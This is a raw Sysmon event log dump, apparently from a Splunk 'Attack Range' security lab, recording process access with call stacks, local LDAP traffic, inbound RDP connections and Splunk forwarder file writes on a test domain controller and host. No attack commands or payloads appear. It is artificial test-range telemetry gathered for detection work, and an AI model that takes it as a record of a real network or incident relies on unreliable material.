09:21:31.645{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055000Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:31.645{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054999Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:31.645{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054998Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:31.645{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054997Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:31.645{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054996Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:31.645{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054995Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:31.645{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054994Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:31.645{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8D1B-6151-7F00-00000000FD01}2644C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054993Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:31.645{5EBD8912-8CD0-6151-3000-00000000FD01}19561552C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8D1B-6151-7F00-00000000FD01}2644C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054992Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:31.646{5EBD8912-8D1B-6151-7F00-00000000FD01}2644C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001054991Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:29.602{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54197-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001054990Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:29.602{5EBD8912-8CD0-6151-2800-00000000FD01}2200C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54197-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001054989Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:29.577{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54196-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001054988Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:29.577{5EBD8912-8CD0-6151-2800-00000000FD01}2200C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54196-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 23542300x8000000000000000980840Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:31.927{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D9E524CE7B5D636FE52C9780A7271915,SHA256=9DDF18A23CB8256A9E1015BC02B01C61EB1779CEEA773EA086069286DA2B907E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055009Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:32.927{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10CBB6EE144171120F58F7B955F08C8E,SHA256=F9B91A946A1FD81FFDB0AB007818F9785E1922900BB56275DC4927AD871837BA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055008Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:29.607{5EBD8912-8CBD-6151-0B00-00000000FD01}640C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54198-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local3268msft-gc 354300x80000000000000001055007Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:29.607{5EBD8912-8CD0-6151-2800-00000000FD01}2200C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local54198-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local3268msft-gc 354300x8000000000000000980843Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:29.355{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.115-59969-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980842Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:32.615{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=9265A43DEF44F647CBF729BC0F2050D1,SHA256=523BA953E26BED43B95D75DF6003E90532522EFF05A8457ECCE8AD925B74F4B5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980845Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:30.831{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59513-false10.0.1.12-8000- 23542300x8000000000000000980844Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:33.083{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=34DCDFAAACFB75EAA42233ED33B096AA,SHA256=20109F9BB9A4B1D22C23383869316917617C41034C4FD1767F386A0EAB5CCDAF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055025Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:33.677{5EBD8912-8D1D-6151-8000-00000000FD01}25082504C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001055024Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:32.125{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de52012-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001055023Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:31.062{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54199-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001055022Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:33.427{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8D1D-6151-8000-00000000FD01}2508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055021Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:33.427{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055020Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:33.427{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055019Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:33.427{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055018Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:33.427{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055017Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:33.427{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055016Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:33.427{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055015Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:33.427{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055014Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:33.427{5EBD8912-8CBF-6151-0C00-00000000FD01}844984C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055013Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 